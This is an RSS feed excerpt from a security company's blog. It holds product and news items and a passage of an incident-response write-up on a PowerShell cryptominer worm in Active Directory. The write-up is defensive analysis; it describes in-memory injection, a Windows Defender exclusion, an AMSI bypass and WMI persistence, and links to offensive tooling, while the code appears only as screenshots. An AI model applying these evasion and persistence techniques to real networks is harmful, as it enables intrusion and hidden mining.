&lt;p&gt;Thanks for reading!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How to handle a distributed crypdominer AD worm]]></title><description><![CDATA[Certego IRT handled a powershell based Active Directory compromise on multiple of our customer networks.]]></description><link>https://www.certego.net/blog/how-to-handle-a-distributed-cryptominer-ad-worm/</link><guid isPermaLink="false">how-to-handle-a-distributed-cryptominer-ad-worm</guid><category><![CDATA[Datasheet]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Gabriele Pippi]]></dc:creator><pubDate>Sun, 01 Jan 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;This and last week, the Certego Incident Response team handled a powershell based Active Directory compromise on multiple of our customer networks.
Although the actors seemed to be intent on spreading a Cryptominer malware, due to some technical aspects the campaign could hide a second goal.
Considering that more and more attacks are aimed to making lateral movements to compromise enterprise domains, today we decided to share with you some details of detection and response actions performed by Certego IRT to handle these threats.&lt;/p&gt;
&lt;p&gt;Note: to prevent antivirus from blocking this site we are forced to share the
code via screenshots, the main samples have been uploaded to virustotal.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Dragonfly by Certego]]></title><description><![CDATA[Your second generation malware sendbox]]></description><link>https://www.certego.net/blog/dragonfly-your-next-generation-malware-sendbox/</link><guid isPermaLink="false">dragonfly-your-next-generation-malware-sendbox</guid><category><![CDATA[Whitepaper]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi]]></dc:creator><pubDate>Sun, 01 Jan 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego has always been strongly involved in researching new ways to analyze malware. We have been working for some time on new projects aimed to evolve how the threat intelligence analysts work and what kind of tools they need. You may have heard of the open source project IntelOwl and the recognition it received by the community: we have just reached 2k stars on Github in less than 2 years! But it is not the only one! We started experimenting and working closely with the community that develops binary emulation frameworks. And we came up with a new idea! A next generation malware sandbox built on binary emulation tools. We called it Dragonfly. Today we are proud to announce that we are finally ready to publish the Alpha release of this project to the community! “So yeah, this is all very exciting! but how does it work?”&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Advance VBA macros]]></title><description><![CDATA[Bypassing Olevba static analyses with zero Hits]]></description><link>https://www.certego.net/blog/advance-vba-macros/</link><guid isPermaLink="false">advance-vba-macros</guid><category><![CDATA[Datasheet]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Gabriele Pippi]]></dc:creator><pubDate>Sat, 31 Dec 2022 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;One of the most common techniques for getting a foothold on a network client is based on Office files containing a malicious VBA macro.
VBA macros are still widely used in a business context and, despite the mitigations offered by security vendors and Microsoft, it is still essential to detect evasion techniques in order to catch smart attackers.&lt;/p&gt;
&lt;p&gt;All the tests carried out are aimed at encouraging the red teams to test new bypass techniques and improving the detection of olevba, mraptor and
vipermonkey public projects.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego listed among the world’s top 250 Managed Security Services Providers by MSSP Alert]]></title><description><![CDATA[We are proud to announce that Certego has been listed of the top 250 MSSP provider in the world]]></description><link>https://www.certego.net/blog/news-certego-listed-among-world-top-250-mssp/</link><guid isPermaLink="false">news-certego-listed-among-world-top-250-mssp</guid><category><![CDATA[News]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Sat, 31 Dec 2022 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;MSSP Alert is the global voice of the Managed Security Service Provider industry.&lt;/p&gt;
&lt;p&gt;Covering managed security service provider (MSSPs), managed detection &amp;#x26; Response and cybersecurity news, his exclusive business, technology and cybersecurity content empowers any company around the world to find the best Cybersecurity partners.&lt;/p&gt;
&lt;p&gt;Thanks to our constant research and development activities, threat intelligence networking and several collaborations with an ever-increasing number of customers all over the world, from any market, Certego is proud to be part of the list of the top 250 international Managed Security Services companies of this year.&lt;/p&gt;
&lt;p&gt;2022 represented a year of great satisfaction for Certego, which saw us engaged in several successful projects and activities of Cybersecurity, Incident Response and Threat Intelligence.&lt;/p&gt;
&lt;p&gt;“The excellent feedbacks we receive every day from our customers are the first step in evaluating the success of our work. This umpteenth acknowledgment proves that our vision and our experts’ skills are increasing recognized even globally, in an ever-competitive market, where sometimes, the wide offer makes difficult to recognize the best partner to rely on” said Bernardino Grignaffini – CEO &amp;#x26; Founder of Certego.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego is part of ECSO "Cybersecurity Made in Europe" label]]></title><description><![CDATA[The industry-driven quality label, supported by ECSO.]]></description><link>https://www.certego.net/blog/news-cybersecurity-made-in-europe/</link><guid isPermaLink="false">news-cybersecurity-made-in-europe</guid><category><![CDATA[News]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Sat, 29 Oct 2022 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Promote cybersecurity in the European Union by supporting ICT companies that offer cybersecurity services: this is the purpose of the &quot;Cybersecurity Made in Europe Label&quot;.&lt;/p&gt;
&lt;p&gt;The project, born within the European Cyber Security Organization (Ecso), a non-profit organization that works alongside the European Commission for IT security policies, represent an important moment of transition for the whole sector.&lt;/p&gt;
&lt;p&gt;The objective of the creators is in fact to give a real &quot;stamp&quot; of quality to companies that provide cybersecurity services.&lt;/p&gt;
&lt;p&gt;The label allow companies to enter a list of high-quality suppliers and will guarantee their recognition towards the international market.&lt;/p&gt;
&lt;p&gt;Certego has proud to be part of this important label, which requires companies to meet important requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;be based in Europe;&lt;/li&gt;
&lt;li&gt;provide reasonable assurance that there are no non-European responsibilities or authorities involved;&lt;/li&gt;
&lt;li&gt;work primarily in Europe and demonstrate that they have more than 50% of R&amp;#x26;D and staff located in the 27 EU countries and the UK;&lt;/li&gt;
&lt;li&gt;provide reliable information security products and services according to ENISA basic basic security requirements for the procurement of secure ICT products and services.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Certego become Cisco Secure Endpoint partner]]></title><description><![CDATA[As a Cisco Solution Partner, Certego implemented the Tactical Response service designed for Cisco Secure Endpoint]]></description><link>https://www.certego.net/blog/certego-become-cisco-secure-endpoint-partner/</link><guid isPermaLink="false">certego-become-cisco-secure-endpoint-partner</guid><category><![CDATA[News]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Pietro Delsante]]></dc:creator><pubDate>Wed, 30 Mar 2022 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;As a Cisco Solution Partner, Certego implemented the Tactical Response service designed for Cisco Secure Endpoint that integrates Cisco&apos;s EDR solution into the Panoptikon SecOps Platform.&lt;/p&gt;
&lt;p&gt;Secure Endpoint is a CISCO product that provides a unified solution for users and endpoints. Through an integrated platform named SecureX, it provides built-in XDR capabilities and enhanced endpoint protection to maximize operational efficiency of endpoint security. Through Certego Tactical Response integration, when Certego IRT detects malicious activities, it can automatically isolate the compromised hosts to block the attack.&lt;/p&gt;
&lt;p&gt;Certego&apos;s Tactical Response solution for CISCO Secure Endpoint significantly reduces the time it takes to contain a cyber security incident by preventing further attacks and infections. It also minimizes the risk associated with ongoing incidents (e.g., by blocking resources related to further infection phases), all in a simple and automated way, reducing the workload of customer IT.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New IntelOwl Major Release v4]]></title><description><![CDATA[The new release of Certego's Threat Intelligence Platform]]></description><link>https://www.certego.net/blog/news-intelowl-major-release-v4/</link><guid isPermaLink="false">news-intelowl-major-release-v4</guid><category><![CDATA[News]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Threat Intelligence]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intel Team Leader]]></dc:creator><pubDate>Wed, 05 Jan 2022 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego has always been strongly involved and participating in open source projects.&lt;/p&gt;
&lt;p&gt;For this reason, we created the &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;IntelOwl&lt;/a&gt; project more than 2 years ago (see the blog post). At that moment we did know that the cyber security community really struggled in automating common and daily routine tasks. &lt;em&gt;&lt;strong&gt;IntelOwl&lt;/strong&gt;&lt;/em&gt; aimed at filling that gap.&lt;/p&gt;
&lt;p&gt;We succeeded. We had strong feedback from the community: we reached almost 2500 stars in Github and more and more people tried to participate in the project.&lt;/p&gt;
&lt;p&gt;As Certego, we have been leveraging IntelOwl internally to facilitate and speed up the gathering of Threat Intelligence data. It is a tool that we can’t live without anymore.&lt;/p&gt;
&lt;p&gt;For this reason we started to think and to focus about the future of the project: we want to make IntelOwl a complete Threat Intelligence Platform that people can use to perform security-related investigations of any kind.&lt;/p&gt;
&lt;p&gt;Today we reached the first step of this process: we are happy to announce that we have published the new major version of one of the most successful Open Source Threat Intelligence projects.&lt;/p&gt;
&lt;p&gt;This new version 4 release brings a &lt;em&gt;&lt;strong&gt;new revamped Graphical User Interface&lt;/strong&gt;&lt;/em&gt;!&lt;/p&gt;
&lt;p&gt;The design was inspired by the same idea we got for &lt;em&gt;&lt;strong&gt;Dragonfly&lt;/strong&gt;&lt;/em&gt;, the next generation malware sandbox service that we released almost a year ago.&lt;/p&gt;
&lt;p&gt;We strongly suggest you check all the details regarding this new release in the &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl/blob/develop/.github/CHANGELOG.md#v400&quot;&gt;official Changelog&lt;/a&gt; and to try the new application by yourself!&lt;/p&gt;
&lt;p&gt;As mentioned earlier, this is just the first step. We have been planning to add to the project some new exciting features that would transform it into a fully fledged Investigation platform that everyone working in cyber security could use for his own goal. If you want to be updated on everything that we are doing and participate in the discussions about the future of the platform, don’t forget that the project is public and everyone is welcome to the community around it! You can follow the project in Github &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;here&lt;/a&gt; and to try the new application by yourself!&lt;/p&gt;
&lt;p&gt;Thanks for reading and happy hunting!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Handling a distributed cryptominer AD worm]]></title><description><![CDATA[This and last week, the Certego Incident Response team handled a powershell based Active Directory compromise on multiple of our customer networks. Although the actors seemed to be intent on spreading a Cryptominer malware, due to some technical aspects the campaign could hide a second goal]]></description><link>https://www.certego.net/blog/distributed-cryptominer-ad-worm/</link><guid isPermaLink="false">distributed-cryptominer-ad-worm</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Gabriele Pippi, Threat Research Lead Engineer]]></dc:creator><pubDate>Wed, 23 Dec 2020 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Malware&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Execution&lt;/li&gt;
&lt;li&gt;Defense Evasion&lt;/li&gt;
&lt;li&gt;Persistence&lt;/li&gt;
&lt;li&gt;Payload delivery&lt;/li&gt;
&lt;li&gt;Dropping malware components
&lt;ul&gt;
&lt;li&gt;Credential Access&lt;/li&gt;
&lt;li&gt;Lateral Movements&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Download and Update / C&amp;#x26;C&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Detection&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Detecting Lateral Movements and persistences&lt;/li&gt;
&lt;li&gt;Detecting Infected Hosts&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Response&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Containment&lt;/li&gt;
&lt;li&gt;Malware Removal&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Conclusions&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;IOCs&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the author&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Credits&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;1.Introduction&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;This and last week, the Certego Incident Response team handled a powershell based &lt;em&gt;&lt;strong&gt;Active Directory compromise on multiple of our customer networks&lt;/strong&gt;&lt;/em&gt;. Although the actors seemed to be intent on spreading a Cryptominer malware, due to some technical aspects the campaign could hide a second goal.&lt;/p&gt;
&lt;p&gt;Considering that more and more attacks are aimed to making lateral movements to compromise enterprise domains, today we decided to share with you some details of detection and response actions performed by Certego IRT to handle these threats.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note: to prevent antivirus from blocking this site we are forced to share the code via screenshots, the main samples have been uploaded to virustotal&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2.Malware&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;In most of the scenarios observed the threat came from unmonitored Domain Trusts, in the remaining cases we were engaged after the &lt;em&gt;&lt;strong&gt;first access&lt;/strong&gt;&lt;/em&gt; was already performed.&lt;/p&gt;
&lt;p&gt;We can assume that the attacker established a foothold through  &lt;em&gt;&lt;strong&gt;valid domain credentials&lt;/strong&gt;&lt;/em&gt; usage against exposed authenticated services, like RDP terminal server. The attacker may have obtained valid credentials exploiting data breach of third-party sites, phishing or dictionary attack/password spraying. In some cases we have found poor password policies which could motivate the last hypothesis.&lt;/p&gt;
&lt;p&gt;Malware was differentiated between domain controllers, 32 and 64 bit hosts. The one installed on domain controllers has the most features.&lt;/p&gt;
&lt;p&gt;The behavior identified by the malware is described below with its respective code block.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Execution&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;The runnig malware is usually found on an infected systems in the form of a powershell.exe or a schtasks.exe process usually spawned by WMI Provider Host ( wmiprvse.exe). The most of executables are loaded into the powershell memory space through a fixed version of &lt;a href=&quot;https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1&quot;&gt;ReflectivePEInjection&lt;/a&gt; script extracted from &lt;a href=&quot;https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1&quot;&gt;Invoke-Mimikatz&lt;/a&gt; or they are written into schtasks process via a &lt;a href=&quot;https://attack.mitre.org/techniques/T1055/012/&quot;&gt;Process Hollowing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The powershell process is easily recognizable by its base64 encoded commandline. The schtasks process, on the other hand, occurs without any parameters and it&apos;s harder to notice.&lt;/p&gt;
&lt;p&gt;If the XMRig has been written to the schtasks process you will notice a consumption of the CPU and network connections to suspicious ports. In general, since schtasks.exe without parameters displays basic information of tasks and exits, any schtasks process without parameters is potentially malicious.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1179px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7f8d0b16bfbc971cfe863cb46bd511ad/60b3a/ADworm1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 57.8125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABiElEQVR42nVSW5LjIAz0PWIMQjwkMLYn3s1WquZn9v6H2oYk8/jYLpUtsIXU3Uz1uJV2llpKXde15hyBkIRDDEDSxVqzmAUweI7khclzcOS9d8w0wqOEQ8I+90XyA0SePCMckX1hKsdN6qFFS0VrCdGnZ+eE1hwFg+SUUkwhlZAV9Z/9J3ZuMTNgTJ/O4N1jNmPnKxkLxPfJJ61Hqru2M2a1mIgW6xbrH4kZie0F5gfbZ7HUVlupbS0qIjmVFqWICs7CkFk6Cc+RYybih2Kf50ygJ5K04LeelXXXdYPyolVKgxLQL4JwjAzZnEV4Z5/FIJJi1fWa1wOtUs5FUwhdfMjtOELqbho5dpbJBrLRdyLAZB2JriK1u8IMbTkES9E6GBNgkXuCHMEntuQt9U8weHLO77e/+5+PetzL23u73rfz3q5I3vfj13n+3rfWtr3UDbR7cBqJ4CJMGD3L3o571pbLqfUtZnBXLSuHjHFsv2EPneafYdCZatJhx7DRzMP1y3y5vIz9L/4B9v9jmpnbHG0AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/7f8d0b16bfbc971cfe863cb46bd511ad/60b3a/ADworm1.png&quot;
        srcset=&quot;/website/static/7f8d0b16bfbc971cfe863cb46bd511ad/804b2/ADworm1.png 384w,
/website/static/7f8d0b16bfbc971cfe863cb46bd511ad/e5715/ADworm1.png 768w,
/website/static/7f8d0b16bfbc971cfe863cb46bd511ad/60b3a/ADworm1.png 1179w&quot;
        sizes=&quot;(max-width: 1179px) 100vw, 1179px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Defense Evasion&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;As shown in some screenshots below, &lt;em&gt;&lt;strong&gt;iex/Invoke-Expression&lt;/strong&gt;&lt;/em&gt; and other dangerous cmdlets used for detection are obfuscated through environment variables.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Before making a lateral movement the malware adds an exception for powershell.exe inside Windows Defender through &lt;a href=&quot;https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference?view=windowsserver2022-ps&amp;#x26;viewFallbackFrom=win10-ps&quot;&gt;Add-MpPreference&lt;/a&gt; cmdlet&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1394px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2e1f7d2ecf6aef404640a37f5dae305e/d4b10/ADworm2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 22.395833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAj0lEQVR42lXP6wrDIAwFYB+k1VivibbaQmGwH3v/t9qxhbKFDzlEAoniepDRYLS+A5EB+wNNa548IGBCteOVc6lSKidOEYJbFjLOElxh5OCsX4DuPmBeydr7XmAt0luDKpJTLMwNtW2FM+csIjHFaZpnrYd5vKqdn36+2969x+8jxBB8iA5bYA+6TiHS//UF+9giAhl878QAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2e1f7d2ecf6aef404640a37f5dae305e/d4b10/ADworm2.png&quot;
        srcset=&quot;/website/static/2e1f7d2ecf6aef404640a37f5dae305e/804b2/ADworm2.png 384w,
/website/static/2e1f7d2ecf6aef404640a37f5dae305e/e5715/ADworm2.png 768w,
/website/static/2e1f7d2ecf6aef404640a37f5dae305e/d4b10/ADworm2.png 1394w&quot;
        sizes=&quot;(max-width: 1394px) 100vw, 1394px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;
&lt;p&gt;In-memory execution through powershell ReflectivePEInjection and a &lt;a href=&quot;https://github.com/hasherezade/libpeconv&quot;&gt;libpeconv&lt;/a&gt; based Process Hollowing injector.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In the most recent malware updates we noticed &lt;a href=&quot;https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell&quot;&gt;this powershell amsi bypass&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 902px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4f9b419096ba5b1df0e9b381b84759da/58213/ADworm3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.05208333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABaklEQVR42o1S2XKDMAzkQwq2LPkCknAk04cm5Gr//5e6NjTJTNtMmB2NZLwrraBgEQliPVtnbGBmMqQBzjAPeCzZaNK6aGM4DKvzUB/7OPXxPNbAhDInx6E+pRg/dziM6XyoL9v6um3H2hatl1w0X7vmumuQH4cAwmmEUJKbMv8CiTEiue5aXL6MzbaxRQMyWvURklMfDn382Pg9YhcOHfKAhvsuzMAIuInkfeXXngsWckJikiWBH634x/CM2yvJOWBIVfkpiIk8Vaoq38qyrF7EQnad9b3lYEiIbGpdvfwUUjPIbmOl5URmTaIRNaJR0EKpIFj+AsgmcBid68Shf20AQYwJBCHOQlkFX1aR0rTk2bPoG5ZLKarEwX+Q7mVCksjk+RUrrAmdDdlEQHFHtQx2j3+O7TaCbc1zSsN5bIYW/EN0EfpvYX5wdsVuLbBt1wkuRfhP+1P0jF2kDvNWsqtlPTLbw56fkb8BZiF3++htGdsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4f9b419096ba5b1df0e9b381b84759da/58213/ADworm3.png&quot;
        srcset=&quot;/website/static/4f9b419096ba5b1df0e9b381b84759da/804b2/ADworm3.png 384w,
/website/static/4f9b419096ba5b1df0e9b381b84759da/e5715/ADworm3.png 768w,
/website/static/4f9b419096ba5b1df0e9b381b84759da/58213/ADworm3.png 902w&quot;
        sizes=&quot;(max-width: 902px) 100vw, 902px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/8138c2da4a1013d8aded8c6084acce3ad28cb037372e4b816b8d2cddab077814/details&quot;&gt;recent_client_agent_sample&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Persistence&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;In some cases we observed successfully running malware launched from a remote host without a local persistence.&lt;/p&gt;
&lt;p&gt;The persistences used by the malware are two &lt;a href=&quot;https://attack.mitre.org/techniques/T1546/003/&quot;&gt;WMI event subscription&lt;/a&gt;. The filters trigger the payload after 1 minute and about 6.5 or 3.8 hours from the system startup:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1242px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/62d55188abc3a612658add4c62d978ee/89048/ADworm4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 27.34375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAvElEQVR42k2PWW7FIAxFs5EEj2CmEKK2eh9V97+smpd+9OoIX2zZhq2cn62dLedstZdyn/XudZ591FKUTDAxJnFDeV1XRhn243A2M6tJWqSWFj1xdxNxGHdTU1bG+PQrpeXJM0yAANv3R/x55Tnvec15LbXaHu/0WnqOw+TKMrLMFr+Gtp5et1riLQpF9UnMRPIERGHXOnw8QXhACL5QGAh97fvZQLp6MBAG9jKCrFogic7hf9v/s/+ZY+kXgOIsBPhqP5sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/62d55188abc3a612658add4c62d978ee/89048/ADworm4.png&quot;
        srcset=&quot;/website/static/62d55188abc3a612658add4c62d978ee/804b2/ADworm4.png 384w,
/website/static/62d55188abc3a612658add4c62d978ee/e5715/ADworm4.png 768w,
/website/static/62d55188abc3a612658add4c62d978ee/89048/ADworm4.png 1242w&quot;
        sizes=&quot;(max-width: 1242px) 100vw, 1242px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Some information used by the malware is inserted into the following custom WMI class:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 801px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4e82ac8576b0d4f15ac232c8e8fdb41d/2ad15/ADworm5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 54.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABLElEQVR42oWPyVIDMQxE8yGxx5L33TPMFgIhcOT/PwhlUgUHINMld/mgV906mJBtrNqFGG2KJnpbc64plhRTjN57o5XXGDRKVKAc6iAAOGec80OdL2356JfTutZW/GnOQ3LV6xQCIgIIITrYpuvoQSeAfnzToYwvdXqr47wspfVxXmp2ivZs7IljxyMtMXabTeye+RfcwryU7BUl2lCB6rGf1d+6135v03o61WGI69paNBLQ5ycAZI/hUEZf5lgbxfpgWx+sRt5xqe33bf/CgFIqQyFAAAgUHZJDx9iR74luPk+Xz3699sG89v65ujlb8qDlw8obHIdzv1xdmahBtjJZGQzeXMu91gQ7m5yZ3LEYoRGs2kbeXOzenAwWp8Ygm7ul0Z+SFQqJuyz/AsoAXgXCwmFeAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4e82ac8576b0d4f15ac232c8e8fdb41d/2ad15/ADworm5.png&quot;
        srcset=&quot;/website/static/4e82ac8576b0d4f15ac232c8e8fdb41d/804b2/ADworm5.png 384w,
/website/static/4e82ac8576b0d4f15ac232c8e8fdb41d/e5715/ADworm5.png 768w,
/website/static/4e82ac8576b0d4f15ac232c8e8fdb41d/2ad15/ADworm5.png 801w&quot;
